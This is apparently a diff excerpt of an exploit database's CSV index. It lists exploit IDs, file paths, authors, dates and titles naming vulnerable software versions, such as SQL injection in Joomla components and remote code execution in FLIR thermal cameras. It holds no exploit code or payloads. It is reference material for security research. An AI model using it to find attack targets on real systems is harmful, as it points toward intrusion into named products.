44165,exploits/php/webapps/44165.txt,"Joomla! Component OS Property Real Estate 3.12.7 - SQL Injection",2018-02-22,"Ihsan Sencan",webapps,php,
44166,exploits/jsp/webapps/44166.txt,"Trend Micro Email Encryption Gateway 5.5 (Build 1111.00) - Multiple Vulnerabilities",2018-02-22,"Core Security",webapps,jsp,
45605,exploits/php/webapps/45605.txt,"MaxOn ERP Software 8.x-9.x - 'nomor' SQL Injection",2018-10-15,"Ihsan Sencan",webapps,php,
44186,exploits/php/webapps/44186.txt,"MyBB My Arcade Plugin 1.3 - Cross-Site Scripting",2018-02-27,0xB9,webapps,php,
44276,exploits/multiple/webapps/44276.txt,"Prisma Industriale Checkweigher PrismaWEB 1.21 - Hard-Coded Credentials",2018-03-12,LiquidWorm,webapps,multiple,
44191,exploits/php/webapps/44191.txt,"School Management Script 3.0.4 - Authentication Bypass",2018-02-27,"Samiran Santra",webapps,php,
@ -39779,6 +39782,8 @@ id,file,description,date,author,type,platform,port
44775,exploits/php/webapps/44775.txt,"ClipperCMS 1.3.3 - Cross-Site Scripting",2018-05-27,"Nathu Nandwani",webapps,php,
44777,exploits/php/webapps/44777.txt,"My Directory 2.0 - SQL Injection / Cross-Site Scripting",2018-05-27,AkkuS,webapps,php,
44778,exploits/php/webapps/44778.txt,"Baby Names Search Engine 1.0 - 'a' SQL Injection",2018-05-27,AkkuS,webapps,php,
45607,exploits/hardware/webapps/45607.txt,"FLIR Brickstream 3D+ - RTSP Stream Disclosure",2018-10-15,LiquidWorm,webapps,hardware,
45606,exploits/hardware/webapps/45606.txt,"FLIR AX8 Thermal Camera 1.32.16 - RTSP Stream Disclosure",2018-10-15,LiquidWorm,webapps,hardware,
44781,exploits/hardware/webapps/44781.txt,"TP-Link TL-WR840N/TL-WR841N - Authenticaton Bypass",2018-05-28,"BlackFog Team",webapps,hardware,
44782,exploits/php/webapps/44782.txt,"DomainMod 4.09.03 - 'oid' Cross-Site Scripting",2018-05-28,longer,webapps,php,
44783,exploits/php/webapps/44783.txt,"DomainMod 4.09.03 - 'sslpaid' Cross-Site Scripting",2018-05-28,longer,webapps,php,
@ -40110,7 +40115,18 @@ id,file,description,date,author,type,platform,port
45589,exploits/php/webapps/45589.txt,"LUYA CMS 1.0.12 - Cross-Site Scripting",2018-10-12,"Ismail Tasdelen",webapps,php,
45590,exploits/windows/webapps/45590.py,"Phoenix Contact WebVisit 2985725 - Authentication Bypass",2018-10-12,Photubias,webapps,windows,
45591,exploits/php/webapps/45591.txt,"HaPe PKH 1.1 - Cross-Site Request Forgery (Update Admin)",2018-10-12,"Ihsan Sencan",webapps,php,
45592,exploits/php/webapps/45592.txt,"CAMALEON CMS 2.4 - Cross-Site Scripting",2018-10-12,"Ismail Tasdelen",webapps,php,
45592,exploits/ruby/webapps/45592.txt,"CAMALEON CMS 2.4 - Cross-Site Scripting",2018-10-12,"Ismail Tasdelen",webapps,ruby,
45593,exploits/php/webapps/45593.txt,"HaPe PKH 1.1 - Arbitrary File Upload",2018-10-12,"Ihsan Sencan",webapps,php,
45594,exploits/php/webapps/45594.txt,"SugarCRM 6.5.26 - Cross-Site Scripting",2018-10-12,"Purplemet Security",webapps,php,
45595,exploits/multiple/webapps/45595.py,"FluxBB < 1.5.6 - SQL Injection",2014-11-21,secthrowaway,webapps,multiple,
45596,exploits/php/webapps/45596.txt,"Academic Timetable Final Build 7.0a-7.0b - 'id' SQL Injection",2018-10-15,"Ihsan Sencan",webapps,php,
45597,exploits/hardware/webapps/45597.txt,"FLIR AX8 Thermal Camera 1.32.16 - Arbitrary File Disclosure",2018-10-15,LiquidWorm,webapps,hardware,
45599,exploits/hardware/webapps/45599.txt,"FLIR Brickstream 3D+ 2.1.742.1842 - Config File Disclosure",2018-10-15,LiquidWorm,webapps,hardware,
45600,exploits/php/webapps/45600.txt,"Academic Timetable Final Build 7.0b - Cross-Site Request Forgery (Add Admin)",2018-10-15,"Ihsan Sencan",webapps,php,
45601,exploits/ruby/webapps/45601.txt,"AlchemyCMS 4.1 - Cross-Site Scripting",2018-10-15,"Ismail Tasdelen",webapps,ruby,
45602,exploits/hardware/webapps/45602.py,"FLIR AX8 Thermal Camera 1.32.16 - Remote Code Execution",2018-10-15,LiquidWorm,webapps,hardware,
45603,exploits/php/webapps/45603.txt,"College Notes Management System 1.0 - 'user' SQL Injection",2018-10-15,"Ihsan Sencan",webapps,php,
45604,exploits/php/webapps/45604.txt,"Advanced HRM 1.6 - Remote Code Execution",2018-10-15,"Renos Nikolaou",webapps,php,
45610,exploits/php/webapps/45610.txt,"Centos Web Panel 0.9.8.480 - Multiple Vulnerabilities",2018-10-15,seccops,webapps,php,
45612,exploits/php/webapps/45612.php,"Academic Timetable Final Build 7.0 - Information Disclosure",2018-10-15,"Ihsan Sencan",webapps,php,
45613,exploits/php/webapps/45613.txt,"KORA 2.7.0 - 'cid' SQL Injection",2018-10-15,"Ihsan Sencan",webapps,php,

Can't render this file because it is too large.